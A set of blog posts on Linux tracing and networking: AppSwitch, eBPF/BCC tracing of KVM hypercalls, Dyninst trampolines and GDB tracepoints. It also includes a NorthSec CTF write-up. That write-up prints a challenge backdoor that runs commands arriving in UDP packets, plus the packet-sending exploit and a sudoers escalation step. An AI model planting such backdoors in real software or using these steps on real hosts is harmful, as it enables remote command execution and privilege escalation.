So, what’s this AppSwitch thing going around?

I recently read Jérôme Petazzoni’s blog post about a tool called AppSwitch which made some Twitter waves on the busy interwebz. I was intrigued. It turns out it was something I was already familiar with. When I met Dinesh back in 2015 at Linux Plumbers in Seattle, he had presented me with a grand vision of how applications need to be free of any networking constraints and configurations, and how a uniform mechanism should evolve that makes such configurations transparent (I’d rather say opaque now). There are layers upon layers of network-related abstractions. Consider a simple network call made by a Java application. It goes through multiple layers in userspace (through the various libs, all the way to native calls from the JVM and eventually syscalls) and then multiple layers in kernel-space (syscall handlers to network subsystems, then to driver layers and over to the hardware). Virtualization adds 4x more layers. Each point in this chain does have a justifiably unique configuration point. Fair point. But from an application’s perspective, it feels like fiddling with the knobs all the time:

[Image: Christmas Settings (https://xkcd.com/1620/)]

For example, we have of course grown accustomed to iptables and to custom in-kernel and out-of-kernel load balancers, and have even pushed some of them to exceptional performance (such as XDP-based load balancing). But when it comes to data path processing, doing nothing at all is much better than doing something very efficiently. Apps don’t really have to care about all these myriad layers anyway. So why not add another dimension to this and let the configuration be done at the app level itself? Interesting.. 🤔

I casually asked Dinesh how far the idea had progressed and he ended up giving me a single binary and told me that’s it! It seems AppSwitch had finally been baked in the oven.

First Impressions

So there is a single static binary named ax which runs both as a regular executable and in a daemon mode. It seems AppSwitch is also distributed as a Docker image. I don’t see any kernel module (unlike what Jérôme tested), so this is definitely the userspace version of the same tech.

I used the ax docker image.  ax was both installed and running with one docker-run command.

$ docker run -d --pid=host --net=none -v /usr/bin:/usr/bin -v /var/run/appswitch:/var/run/appswitch --privileged docker.io/appswitch/ax 

Based on the documentation, this little binary seems to do a lot — service discovery, load balancing, network segmentation etc.  But I just tried the basic features in a single-node configuration.

Let’s run a Java webserver under ax.

# ax run --ip 1.2.3.4 -- java -jar SimpleWebServer.jar

This starts the webserver and assigns the IP 1.2.3.4 to it. It’s like overlaying the server’s own IP configuration through ax such that all requests are then redirected through 1.2.3.4. While idling, I didn’t see any resource consumption in the ax daemon. If it were monitoring system calls with auditd or something, I’d have noticed some CPU activity. Well, the server didn’t break, and when accessed via a client run through ax, it served just fine.

# ax run --ip 5.6.7.8 -- curl -I 1.2.3.4

HTTP/1.0 500 OK
Date: Wed Mar 28 00:19:25 PDT 2018
Server: JibbleWebServer/1.0
Content-Type: text/html
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Content-Length: 58
Last-modified: Wed Mar 28 00:19:25 PDT 2018

Naaaice! 🙂 Why not try connecting with Firefox. Ok, wow, this works too!

[Image: Firefox connecting to the test server through ax]

I tried this with a Golang HTTP server (Caddy) that is statically linked. If ax were doing something like LD_PRELOAD, that would trip it up. This time I tried passing a name rather than an IP and ran it as a regular user with the built-in --user option.

# ax run --myserver --user suchakra -- caddy -port 80

# ax run --user suchakra -- curl -I myserver
HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Length: 0
Content-Type: text/html; charset=utf-8
Etag: "p6f4lv0"
Last-Modified: Fri, 30 Mar 2018 19:25:07 GMT
Server: Caddy
Date: Sat, 31 Mar 2018 01:52:28 GMT

So no kernel module tricks, it seems. I guess this explains why Jérôme called it a “Network Stack from the future”. The future part here is the applications: with containerized deployments now predominant, the problems of microservices networking have really shifted closer to the apps.

We need to get rid of the overhead caused by networking layers and the frequent context switches that happen as one containerized app communicates with another. AppSwitch could potentially eliminate this altogether, and the communication would actually resemble traditional socket-based IPC mechanisms, with the advantage of a zero-overhead read/write cost once the connection is established. I think I would want to test this out thoroughly sometime in the future if I get some time off from my bike trips 🙂

How does it work?

Frankly, I don’t know in depth, but I can guess. All applications, containerized or not, are just a bunch of executables linked to libs (or built statically) running over the OS. When they need the OS’s help, they ask. To understand an application’s behavior, or to morph it, the OS can tell us what is going on and provides interfaces to modify that behavior. Auditd, for example, when configured, can allow us to monitor every syscall from a given process. Programmable LSMs can be used to set per-resource policies with the kernel’s help. For performance observability, tracing tools have traditionally given us insight into what goes on underneath. In the world of networking, we again take the OS’s help – routing and filtering strategies are still defined through iptables, with some advances happening in BPF-XDP. However, in the case of networking, calls such as connect() and accept() could be intercepted purely in userspace as well. But doing so robustly and efficiently, without application or kernel changes and with reasonable performance, has been a hard academic problem for decades [1][2]. There must be some other smart things at work underneath ax to keep this robust enough for all kinds of apps.

With the interception problem solved, ax can create a map and actually perform the ‘switching’ part (which I suppose justifies the AppSwitch name). I have tested it so far on Java, Go and Python servers. With network syscall interception seemingly working fine, the data then flows like a hot knife through butter. There may be some more features and techniques that I have missed though. Going through ax --help, it seems there are some options for egress, WAN etc., but I haven’t played with those much.
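To make the interception idea concrete, here is the classic (and fragile) LD_PRELOAD flavor of it. To be clear, this is my own toy sketch and not how ax works (a preloaded shim cannot touch statically linked binaries like the Caddy server above, or direct syscalls, which is exactly what makes the problem hard), but it shows what “intercepting connect() in userspace” means:

/* shim.c -- build with: gcc -shared -fPIC shim.c -o shim.so -ldl
 * run with:             LD_PRELOAD=./shim.so curl -I 1.2.3.4
 */
#define _GNU_SOURCE
#include <arpa/inet.h>
#include <dlfcn.h>
#include <stdio.h>
#include <sys/socket.h>

int connect(int fd, const struct sockaddr *addr, socklen_t len)
{
    /* resolve the real connect() the first time we are called */
    static int (*real_connect)(int, const struct sockaddr *, socklen_t);
    if (!real_connect)
        real_connect = (int (*)(int, const struct sockaddr *, socklen_t))
                       dlsym(RTLD_NEXT, "connect");

    if (addr->sa_family == AF_INET) {
        const struct sockaddr_in *in = (const struct sockaddr_in *) addr;
        char ip[INET_ADDRSTRLEN];
        inet_ntop(AF_INET, &in->sin_addr, ip, sizeof(ip));
        fprintf(stderr, "intercepted connect() to %s:%d\n",
                ip, ntohs(in->sin_port));
        /* a switching layer could rewrite the destination here
         * before handing the call down */
    }
    return real_connect(fd, addr, len);
}

A robust solution has to catch such calls at a level that even static binaries and runtimes like the JVM or Go cannot bypass, which is where the decades of research cited above come in.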

Some Resources

References

[1] Practical analysis of stripped binary code [link]
[2] Analyzing Dynamic Binary Instrumentation Overhead [link]


An entertaining eBPF XDP adventure

In this post, I discuss the CTF competition track of NorthSec, an awesome security conference, and specifically our tale of collecting two elusive flags that happened to be based upon eBPF XDP technology – something that is bleeding edge and uber cool!

In case you did not know, the eBPF-based eXpress Data Path (XDP) is redefining how network traffic is handled on devices. Filtering, routing and reshaping of incoming packets at a very early stage (even before the packets enter the networking stack of the Linux kernel) has allowed unprecedented speed and provides a base for applications in the security (DDoS mitigation), networking and performance domains. There is a lot of material from Quentin Monnet, Julia Evans, and the Cilium and IOVisor projects about what eBPF/XDP is capable of. For the uninitiated, generic information about eBPF can also be found on Brendan Gregg’s eBPF page and links. If you think you want to get serious about this, here are some more links and detailed docs. In a recent talk I gave, I showed a diagram similar to the one below, as I started teasing myself with the possible avenues beyond the performance monitoring and tracing usecase that is dear to my heart:

[Image: TC with cls_bpf and XDP. Actions on packet data are taken at the driver level in XDP]

The full presentation is here. So, what’s interesting here is that incoming packets from the net-device can now be statefully filtered or manipulated even before they reach the network stack. This has been made possible by the use of extended Berkeley Packet Filter (eBPF) programs, which allow such low-level actions at the driver level to be flexibly programmed in a safe manner from userspace. The programming is done in a restricted-C syntax that gets compiled to BPF bytecode by LLVM/Clang. The bpf() syscall then allows the bytecode to be loaded into the kernel at the proper place – here, these are the ‘hooks’ at the ingress and egress of raw packets. Before getting attached, the program goes through a very strict verifier, and an efficient JIT compiler converts the BPF program to native machine code (which is what makes eBPF pretty fast).

Unlike the register struct context for eBPF programs attached to kprobes, the context passed to XDP eBPF programs is the XDP metadata struct. The data is directly read and parsed from within the BPF program, reshaped if required, and an action is taken for it. The action can be XDP_PASS, where the packet is passed on to the network stack as seen in the diagram, XDP_DROP, where it is dropped by essentially sending it back to the driver queue, or XDP_TX, which sends the packet back out the NIC it came from. While PASS and DROP are a good fit for scenarios such as filtering IPs, ports and packet contents, the TX usecase is more suited for load balancing, where the packet contents can be modified and transmitted back to the NIC. Currently, Facebook is exploring its use and presented their XDP-based load balancing and DDoS prevention framework at the recent Netdev 2.1 in Montreal. The Cilium project is another example of XDP’s use in container networking and security, and is an important project resulting from the eBPF tech.
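To give a flavor of that restricted-C, here is a minimal XDP program of my own (not from the CTF, and the port is just a made-up example) that drops UDP packets destined to port 9999 and passes everything else. It assumes a clang -O2 -target bpf build and libbpf’s bpf_endian.h for the byte-order helpers:

#include <linux/bpf.h>
#include <linux/if_ether.h>
#include <linux/in.h>
#include <linux/ip.h>
#include <linux/udp.h>
#include <bpf/bpf_endian.h>

#define SEC(NAME) __attribute__((section(NAME), used))

SEC("xdp")
int xdp_drop_udp_9999(struct xdp_md *ctx)
{
    void *data     = (void *)(long)ctx->data;
    void *data_end = (void *)(long)ctx->data_end;

    /* every access is bounds-checked to keep the in-kernel verifier happy */
    struct ethhdr *eth = data;
    if ((void *)(eth + 1) > data_end || eth->h_proto != bpf_htons(ETH_P_IP))
        return XDP_PASS;

    struct iphdr *ip = (void *)(eth + 1);
    if ((void *)(ip + 1) > data_end || ip->protocol != IPPROTO_UDP)
        return XDP_PASS;

    struct udphdr *udp = (void *)(ip + 1);      /* assumes no IP options */
    if ((void *)(udp + 1) > data_end)
        return XDP_PASS;

    if (udp->dest == bpf_htons(9999))           /* made-up port */
        return XDP_DROP;

    return XDP_PASS;
}

char _license[] SEC("license") = "GPL";

Attaching something like this to an interface can be done with iproute2 (ip link set dev eth0 xdp obj prog.o sec xdp), given a recent enough kernel and driver.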

NorthSec BPF Flag – Take One

Ok, enough of XDP basics for now. Coming back to the curious case of a fancy CTF challenge at NorthSec: we were presented with a VM and told that “Strange activity has been detected originating from the rao411 server, but our team has been unable to understand from where the commands are coming from, we need your help.” It was also explicitly stated that the machine was an up-to-date Ubuntu 17.04 with an unmodified kernel. Well, for me that is a pretty decent hint that this challenge would require kernel sorcery. Simon checked /var/log/syslog and saw suspicious entries every minute or two showing the /bin/true command being run. Pretty strange. We sat together and tried to use netcat to listen for network chatter on multiple ports, as we guessed that something was being sent from outside to the rao411 server. Is it possible that the packets were somehow being dropped even before they reached the network stack? We quickly realized that what we were seeing was indeed related to BPF, as we saw some telltale files lying around in the VM (after the CTF, Julien Desfossez, who designed the challenge, was generous enough to provide the code, which itself is based on Jesper Dangaard Brouer’s code in the kernel source tree). As we can see, there are the familiar helper functions used for loading BPF programs and manipulating BPF maps. Apart from that, there was the xdp_nsec_kern.c file which contained the BPF program itself! A pretty decent start it seems 🙂 Here is the code for the parse_port() function in the BPF XDP program that is eventually called when a packet is encountered :


u32 parse_port(struct xdp_md *ctx, u8 proto, void *hdr)
{
    void *data_end = (void *)(long)ctx->data_end;
    struct udphdr *udph;
    u32 dport;
    char *cmd;
    unsigned long payload_offset;
    unsigned long payload_size;
    char *payload;
    u32 key = 0;

    if (proto != IPPROTO_UDP) {
        return XDP_PASS;
    }

    udph = hdr;
    if (udph + 1 > data_end) {
        return XDP_ABORTED;
    }

    payload_offset = sizeof(struct udphdr);
    payload_size = ntohs(udph->len) - sizeof(struct udphdr);

    dport = ntohs(udph->dest);
    if (dport == CMD_PORT + 1) {
        return XDP_DROP;
    }

    if (dport != CMD_PORT) {
        return XDP_PASS;
    }

    if ((hdr + payload_offset + CMD_SIZE) > data_end) {
        return XDP_ABORTED;
    }
    cmd = bpf_map_lookup_elem(&nsec, &key);
    if (!cmd) {
        return XDP_PASS;
    }
    memset(cmd, 0, CMD_SIZE);
    payload = &((char *) hdr)[payload_offset];
    cmd[0] = payload[0];
    cmd[1] = payload[1];
    cmd[2] = payload[2];
    cmd[3] = payload[3];
    cmd[4] = payload[4];
    cmd[5] = payload[5];
    cmd[6] = payload[6];
    cmd[7] = payload[7];
    cmd[8] = payload[8];
    cmd[9] = payload[9];
    cmd[10] = payload[10];
    cmd[11] = payload[11];
    cmd[12] = payload[12];
    cmd[13] = payload[13];
    cmd[14] = payload[14];
    cmd[15] = payload[15];

    return XDP_PASS;
}

Hmmm… this is a lot of information. First, we observe that the destination port is extracted from the UDP header by the BPF program and the packets are only passed if the destination port is CMD_PORT (which turns out to be 9000 as defined in the header xdp_nsec_common.h). Note that the XDP actions are happening too early, hence even if we were to listen at port 9000 using netcat, we would not see any activity. Another pretty interesting thing is that some payload from the packet is being used to prepare a cmd string. What could that be? Why would somebody prepare a command from a UDP packet? 😉

Let’s dig deeper. So, /var/log/syslog was saying that xdp_nsec_cmdline was being executed intermittently and was running /bin/true. Maybe there is something in that file? A quick glance at xdp_nsec_cmdline.c confirms our line of thought! Here is a snippet from its main function :

int main(int argc, char **argv)
{
.
.
    cmd = malloc(CMD_SIZE * sizeof(char));
    fd_cmd = open_bpf_map(file_cmd);

    memset(cmd, 0, CMD_SIZE);
    ret = bpf_map_lookup_elem(fd_cmd, &key, cmd);
    printf("cmd: %s, ret = %d\n", cmd, ret);
    close(fd_cmd);
    ret = system(cmd);
.
.
}

The program opens the pinned BPF map file_cmd (which actually is /sys/fs/bpf/nsec), looks up the value stored there and executes it. Such Safe. Much Wow. It seems we are very close. We just need to craft a UDP packet that updates the map with the command in its payload. The first flag was a file called flag which was not accessible to the logged-in raops user. So we just made a script in /tmp which changed the permissions on that file, and sent a UDP packet with the script’s path as the payload.
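In case you prefer something more explicit than the bash trick below, a minimal C sender does the same job. The server IP here is a stand-in, and the payload buffer is padded to CMD_SIZE (16 bytes) so that the bounds check in the BPF program is satisfied:

#include <arpa/inet.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

int main(void)
{
    int s = socket(AF_INET, SOCK_DGRAM, 0);

    struct sockaddr_in dst = { 0 };
    dst.sin_family = AF_INET;
    dst.sin_port = htons(9000);                      /* CMD_PORT */
    inet_pton(AF_INET, "10.0.0.42", &dst.sin_addr);  /* stand-in for rao411 */

    char payload[16] = { 0 };                        /* CMD_SIZE bytes */
    strncpy(payload, "/tmp/a.sh", sizeof(payload) - 1);

    sendto(s, payload, sizeof(payload), 0,
           (struct sockaddr *) &dst, sizeof(dst));
    close(s);
    return 0;
}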

Trivia! Bash can send UDP packets on its own, through its /dev/udp pseudo-device:
echo -n "/tmp/a.sh" >/dev/udp/<server_ip>/9000

So, we now just had to wait for the program to run the xdp_nsec_cmdline which would trigger our script. And of course it worked! We opened the flag and submitted it. 6 points to InfoSecs!

NorthSec BPF Flag – Take Two

Of course, our immediate next action was to add the raops user to /etc/sudoers 😉 Once we had root access, we could recompile and re-insert the BPF program as we wished. Simon observed an interesting check in the BPF XDP program listed above that raised our eyebrows :

...
    if (dport == CMD_PORT + 1) {
        return XDP_DROP;
    }

    if (dport != CMD_PORT) {
        return XDP_PASS;
    }
...

Why would someone want to explicitly drop the packets coming in at 9001? Unless.. there was a message being sent on that port from outside! While not an elegant approach, we just disabled the XDP_DROP check so that the packets would reach the network stack and we could simply netcat the data on that port. Recompile, re-insert and it worked! The flag was indeed being sent on 9001, which was no longer being dropped. 8 points to InfoSecs!

Mandatory cool graphic of us working

I really enjoyed this gamification of advanced kernel tech, as it increases its reach to young folks interested in Linux kernel internals and modern networking technologies. Thanks to Simon Marchi for seeing this through with me and to Francis Deslauriers for pointing out the challenge to us! Also, thanks to the NorthSec team (esp. Julien Desfossez and Michael Jeanson) who designed this challenge and made the competition more fun for me! In fact, Julien started building it while watching the XDP talks at Netdev 2.1. Also, thanks to the wonderful lads Marc-Andre, Ismael, Felix, Antoine and Alexandre from the University of Sherbrooke who kept the flag-chasing momentum going 🙂 It was a fun weekend! That’s all for now. If I get some more time, I’ll write about an equally exciting LTTng CTF (Common Trace Format) challenge which Simon cracked while I watched from the sidelines.

EDIT : Updated the above diagram to clarify that XDP filtering happens early at the driver level – even before TC ingress and egress. TC with cls_bpf also allows BPF programs to be run. This was indeed a precursor to XDP.

Analyzing KVM Hypercalls with eBPF Tracing

I still visit my research lab quite often. It’s always nice to be in the zone where boundaries of knowledge are being pushed further and excitement is in the air. I like this ritual as this is a place where one can discuss linux kernel code and philosophy of life all in a single sentence while we quietly sip our hipster coffee cups.

In the lab, Abder is working these days on some cool hypercall stuff. The exact details of his work are quite complex, but he calls his tool hypertrace. I think I am sold on the name already. Hypercalls are like syscalls, but instead of going to the kernel, such calls are made from a guest to the hypervisor, with arguments and an identifier value (just like syscalls). The hypervisor then brokers the privileged operation for the guest. Pretty neat. Here is some kernel documentation on hypercalls.

So Abder steered one recent discussion towards the internals of KVM and wanted to know the latency caused by a hypercall he was introducing for his experiments (as I said, he is introducing a new hypercall with an ID – for example, 42). His analysis usecase was quite specific: he wanted to trace the kvm_exit -> kvm_hypercall -> kvm_entry sequence to know the exact latency he was causing, for a given duration. In addition, the tracing overhead needed to be minimal and the trace only needed to run for a short time. The first part is somewhat trivial: these 3 tracepoints already exist in the kernel and he could latch on to them. Essentially, he needed to look at the exit_reason argument of the kvm_exit tracepoint and check that it is a VMCALL (18), which would denote that a hypercall is coming up next. Then he could look at the following kvm_entry event and take the time-delta to get the latency. Even though it is possible to record these events with traditional tracers such as LTTng and Ftrace, Abder was only interested in his specific hypercall (nr = 42), along with the kvm_exit that happened before it (with exit_reason = 18) and the kvm_entry after it. This is not straightforward. It’s not possible to do such specific tracing with traditional tracers at high speed and low overhead: the selection of events should not just be a simple filter, but has to be stateful. Just when Abder was about to embark on a journey of kprobes and kernel modules, I once more got the opportunity of being Morpheus and said “What if I told you…

The rest is history. (dramatic pause)

Jokes apart, here is a small demo of eBPF/BCC script that allows us to hook onto the 3 aforementioned tracepoints in the Linux kernel and conditionally record the trace events:

from __future__ import print_function
from bcc import BPF

# load BPF program
b = BPF(text="""
#define EXIT_REASON 18
BPF_HASH(start, u8, u8);

TRACEPOINT_PROBE(kvm, kvm_exit) {
    u8 e = EXIT_REASON;
    u8 one = 1;
    if (args->exit_reason == EXIT_REASON) {
        bpf_trace_printk("KVM_EXIT exit_reason : %d\\n", args->exit_reason);
        start.update(&e, &one);
    }
    return 0;
}

TRACEPOINT_PROBE(kvm, kvm_entry) {
    u8 e = EXIT_REASON;
    u8 zero = 0;
    u8 *s = start.lookup(&e);
    if (s != NULL && *s == 1) {
        bpf_trace_printk("KVM_ENTRY vcpu_id : %u\\n", args->vcpu_id);
        start.update(&e, &zero);
    }
    return 0;
}

TRACEPOINT_PROBE(kvm, kvm_hypercall) {
    u8 e = EXIT_REASON;
    u8 *s = start.lookup(&e);
    if (s != NULL && *s == 1) {
        bpf_trace_printk("HYPERCALL nr : %d\\n", args->nr);
    }
    return 0;
}
""")

# header
print("%-18s %-16s %-6s %s" % ("TIME(s)", "COMM", "PID", "EVENT"))

# format output
while 1:
    try:
        (task, pid, cpu, flags, ts, msg) = b.trace_fields()
    except ValueError:
        continue

    print("%-18.9f %-16s %-6d %s" % (ts, task, pid, msg))

The TRACEPOINT_PROBE() interface in BCC allows us to use static tracepoints in the kernel. For example, whenever a kvm_exit occurs in the kernel, the first probe is executed and it records the event if the exit reason was VMCALL. At the same time it updates a BPF hash map, which basically acts as a flag here for the other events. I recommend checking out Lesson 12 from the BCC Python Developer Tutorial if this seems interesting to you 🙂 In addition, the reference guide lists the most important C and Python APIs for BCC.

To test the above example out, we can introduce our own hypercall in the VM using this small test program :

/* the raw bytes 0x0F 0x01 0xC1 encode the vmcall instruction */
#define do_hypercall(nr, p1, p2, p3, p4) \
__asm__ __volatile__(".byte 0x0F,0x01,0xC1\n"::"a"(nr), \
    "b"(p1), \
    "c"(p2), \
    "d"(p3), \
    "S"(p4))

void main()
{
    do_hypercall(42, 0, 0, 0, 0);
}

While the BPF program is running, if we do a hypercall, we get the following output :

TIME(s)            COMM             PID    EVENT
1795.472072000     CPU 0/KVM        7288   KVM_EXIT exit_reason : 18
1795.472112000     CPU 0/KVM        7288   HYPERCALL nr : 42
1795.472119000     CPU 0/KVM        7288   KVM_ENTRY vcpu_id : 0

So we see how in a few minutes we could precisely gather only those events that were of interest to us, saving us the hassle of setting up other traces or kernel modules. eBPF/BCC-based analysis allowed us to conditionally trace only a certain subsection of events instead of the huge flow of events that we would otherwise have had to analyze offline. KVM internals are like a dark dungeon and I feel as if I am embarking on a quest here. There is a lot more upcoming KVM-related analysis we are doing with eBPF/BCC. Stay tuned for updates! If you find any more interesting usecases for eBPF in the meantime, let me know. I would love to try them out! As always, comments, corrections and criticisms are welcome.

Unravelling Code Injection in Binaries

It seems pretty surreal going through old lab notes again. It’s like a time capsule – an opportunity to laugh at your previous stupid self and your desperate attempts at trying to rectify that situation. My previous post on GDB’s fast tracepoints and their clever use of jump-pads longs for a more in-depth explanation on what goes on when you inject your own code in binaries.

Binary Instrumentation

The ability to inject code dynamically in a binary – either executing or on disk – gives huge power to the developer. It basically eliminates the need for source code and re-compilation in most cases where you want to have your own small piece of code run in a function, possibly changing the flow of the program. For example, a tiny tracer that counts the number of times a certain variable was assigned the value 42 in a target function. Through binary instrumentation, it becomes easy to insert such tiny code snippets for inexpensive tracing even in production systems, and then safely remove them once we are done – making sure that the overhead of static tracepoints is avoided as well. Though a very common task in the security domain, binary instrumentation also forms the basis for debuggers and tracing tools. I think one of the most interesting study materials to read from an academic perspective is Nethercote’s PhD thesis. Through this, I learnt about the magic of Valgrind (which screams for a separate blog post) and the techniques beyond breakpoints and trampolines. In reality, most of us may not usually look beyond ptrace() when we hear about playing with code instrumentation. GDB’s backbone and some of my early experiments in binary fun have been with ptrace() only. While Eli Bendersky explains some of the debugger magic and the role of ptrace() in sufficient detail, I explore more of what happens when the code is injected and modifies the process while it executes.

Primer

The techniques for binary instrumentation are numerous. The base of all the approaches is the ability to halt the process, identify an instrumentation point (a function, an offset from function start, an address etc.), modify its memory at that point, execute code and rewrite/restore registers. For on-disk instrumentation, the ability to load the binary, parse, disassemble and patch it with instrumentation code is required. There are then multiple ways to insert/patch the binary. In all these ways, there is always a tradeoff between overhead (size and the added time due to the extra code), control over the binary (how much and where we can modify) and robustness (what if the added code makes the actual execution unreliable – for example, loops etc.). From what I have understood from my notes, I basically classify the ways to go about code patching into a few categories. There may be crazier ones (such as those used in viruses), but for tracing/debugging tools most of them are as follows :

  • TRAP Based : I already discussed this in the last post with GDB’s normal tracepoints. Such a technique is also used in older non-optimized Kprobes. An exception causing instruction (such as int 3) is inserted at the desired point and its handler calls the code which you want to execute. Pretty standard stuff.
  • JIT Recompilation Based : This is something more interesting and is used by Valgrind. The binary is first disassembled and converted to an intermediate representation (IR). The IR is then instrumented with the analysis code from the desired Valgrind tool (such as memcheck). The code is recompiled, stored in a code-cache and executed on a ‘synthetic CPU’. This is like JIT compilation, but applied to analysis tools. The control over the information that can be gathered in such cases is very high, but so is the overhead (it can go from 4x to 50x slower in various cases).
  • Trampoline Based : Boing! Basically, we just patch the location with a jump to a jump-pad or trampoline (different names for the same thing). This trampoline can execute the displaced instructions and then prepare another jump to the instrumented code and then back to the actual code. This out-of-line execution maintains sufficient speed and reduces overhead, as no TRAP, context switch or handler call is involved. Many binary instrumentation frameworks, such as Dyninst, are built upon this. We will explain this one in further detail (see the small patching sketch right after this list).
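To show how little magic there is in the “patch with a jump” part, here is a toy x86-64 sketch of my own (not Dyninst code, and with no error handling) that simply overwrites the start of a function with a 5-byte relative jmp to a replacement. A real trampoline would also relocate and execute the displaced instructions out of line and jump back, as described next; also note that a hardened system may refuse the writable+executable mprotect():

/* patchjmp.c -- build with: gcc -O0 patchjmp.c -o patchjmp */
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

void foo(void) { puts("original foo()"); }
void bar(void) { puts("instrumented bar()"); }

int main(void)
{
    /* make the page(s) containing foo() writable as well as executable */
    long pagesz = sysconf(_SC_PAGESIZE);
    void *page = (void *)((uintptr_t)foo & ~(pagesz - 1));
    mprotect(page, 2 * pagesz, PROT_READ | PROT_WRITE | PROT_EXEC);

    /* 0xE9 is 'jmp rel32'; the displacement is relative to the end
       of the 5-byte jump instruction */
    uint8_t patch[5] = { 0xE9 };
    int32_t rel = (int32_t)((uintptr_t)bar - ((uintptr_t)foo + 5));
    memcpy(&patch[1], &rel, sizeof(rel));
    memcpy((void *)foo, patch, sizeof(patch));

    foo();   /* control now lands in bar() */
    return 0;
}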

Dyninst’s Trampoline

Dyninst’s userspace-only trampoline approach is quite robust and fast. It has been used in performance analysis tools such as SystemTap, Vampir and Tau, and is hence a candidate for my scrutiny. To get a feel for what happens under the hood, let’s have a look at what Dyninst does to our code when it patches it.

Dyninst provides some really easy-to-use APIs to do the heavy lifting for you. Most of them are very well documented as well. Dyninst introduces the concept of a mutator, which is the program that is supposed to modify the target, or mutatee. The mutatee can either be a running application or a binary residing on disk. Attaching to, or creating, a target process allows the mutator to control the execution of the mutatee. This can be achieved by either processCreate() or processAttach(). The mutator then gets the program image object, which is a static representation of the mutatee. Using the program image, the mutator can identify all possible instrumentation points in the mutatee. The next step is creating a snippet (the code you want to insert) to be inserted at the identified point in the mutatee. Building small snippets can be trivial. For example, small snippets can be defined using the BPatch arithExpr and BPatch varExp types. Here is a small sample. The snippet is compiled into machine language and copied into the application’s address space. This is easier said than done though. For now, we just care about how the snippet affects our target process.

Program Execution flow

The Dyninst API inserts this compiled snippet at the instrumentation points. Underneath is the familiar ptrace() technique of pausing and poking memory. The instruction at the instrumentation point is replaced by a jump to a base trampoline. The base trampoline then jumps to a mini-trampoline that starts by saving any registers that will be modified. Next, the instrumentation is executed. The mini-trampoline then restores the necessary registers, and jumps back to the base trampoline. Finally, the base trampoline executes the replaced instruction and jumps back to the instruction after the instrumentation point. Here is a relevant figure taken from this paper :

[Image: Dyninst trampoline control flow, taken from the referenced paper]

As part of some trials, I took a tiny piece of code and inserted a snippet at the end of the function foo(). Dyninst changed it to the following :

[Image: disassembly of foo() after patching, showing the inserted jump to the trampoline]

Hmm.. interesting. So the trampoline starts at 0x10000 (relative to the PC). Our instrumentation point was intended to be the function exit. It means Dyninst just replaces the whole function in this case. Probably it is safer this way rather than replacing a single instruction or a small set of instructions mid-function. Dyninst’s API checks for many other things when building the snippet. For example, we need to see if the snippet contains code that recursively calls itself, causing the target program to stop going further. It is more like a verifier for the code being inserted (similar to eBPF’s verifier in the Linux kernel, which checks for loops etc. before allowing the eBPF bytecode to execute). So what is the trampoline doing? I used GDB to hook onto what is going on, and here is a reconstruction of the flow :

[Image: reconstructed control flow through the base trampoline and the snippet]

Clearly, the first thing the trampoline does is execute the remaining function out of line, but before returning, it starts preparing the snippet’s execution. The snippet was a pre-compiled LTTng tracepoint (that is a story for another day perhaps), but you don’t have to bother much about it. Just think of it as a call to my own function from within the target process. First the stack is grown and the machine registers are pushed onto it, so that we can come back to the state we were in after the instrumented code has executed. The stack is then grown further for the snippet’s use. Next, the snippet gets executed (the gray box) and the stack is shrunk back by the same amount. The registers pushed on the stack are restored along with the original stack pointer, and we return as if nothing happened. There is no interrupt, no context-switch, no lengthy diversions. Just simple userspace code 🙂

So now we know! You can use Dyninst and other such frameworks like DynamoRIO or PIN to build your own tools for tracing and debugging. Playing with such tools can be insane fun as well. If you have any great ideas or want me to add something in this post, leave a comment!

Fast Tracing with GDB

Even though GDB is a traditional debugger, it provides support for dynamic fast user-space tracing. Tracing in simple terms is super fast data logging from a target application or the kernel. The data is usually a superset of what a user would normally want from debugging but cannot get because of the debugger overhead. The traditional debugging approach can indeed alter the correctness of the application output or alter its behavior. Thus, the need for tracing arises. GDB in fact is one of the first projects which tried to have an integrated approach of debugging and tracing using the same tool. It has been designed in a manner such that sufficient decoupling is maintained – allowing it to expand and be flexible. An example is the use of In-Process Agent (IPA) which is crucial to fast tracing in GDB but is not necessary for TRAP-based normal tracepoints.

GDB’s Tracing Infrastructure

Tracing is performed with the trace and collect commands. The location where the user wants to collect some data is called a tracepoint. It is just a special type of breakpoint without support for running GDB commands on a tracepoint hit. As the program progresses and passes the tracepoint, data (such as register values, memory values etc.) gets collected based on certain conditions (if so desired). The data collection is done in a trace buffer when the tracepoint is hit. Later, that data can be examined from the collected trace snapshot using tfind. However, tracing for now is restricted to remote targets (such as gdbserver). Apart from this type of dynamic tracing, there is also support for static tracepoints, in which instrumentation points known as markers are embedded in the target and can be activated or deactivated. The process of installing these static tracepoints is known as probing a marker. Assuming that you have started GDB and your binary is loaded, a sample trace session may look something like this :

(gdb) trace foo
(gdb) actions
Enter actions for tracepoint #1, one per line.
> collect $regs,$locals
> while-stepping 9
  > collect $regs
  > end
> end
(gdb) tstart
[program executes/continues...]
(gdb) tstop

This puts a tracepoint at foo, collects all register values and locals at the tracepoint hit, and then collects all register values for each of the subsequent 9 instruction executions. We can now analyze the data using tfind or tdump.

(gdb) tfind 0
Found trace frame 0, tracepoint 1
54    bar    = (bar & 0xFF000000) >> 24;

(gdb) tdump
Data collected at tracepoint 1, trace frame 0:
rax    0x2000028 33554472
rbx    0x0 0
rcx    0x33402e76b0 220120118960
rdx    0x1 1
rsi    0x33405bca30 220123089456
rdi    0x2000028 33554472
rbp    0x7fffffffdca0 0x7fffffffdca0
rsp    0x7fffffffdca0 0x7fffffffdca0
.
.
rip    0x4006f1 0x4006f1 <foo+7>
[and so on...]

(gdb) tfind 4
Found trace frame 4, tracepoint 1
0x0000000000400700 55    r1 = (bar & 0x00F00000) >> 20;

(gdb) p $rip
$1 = (void (*)()) 0x400700 <foo+22>

So one can observe data collected from different trace frames in this manner, and even output it to a separate file if required. To go deeper into how tracing works, let’s look at GDB’s two tracing mechanisms :

Normal Tracepoints

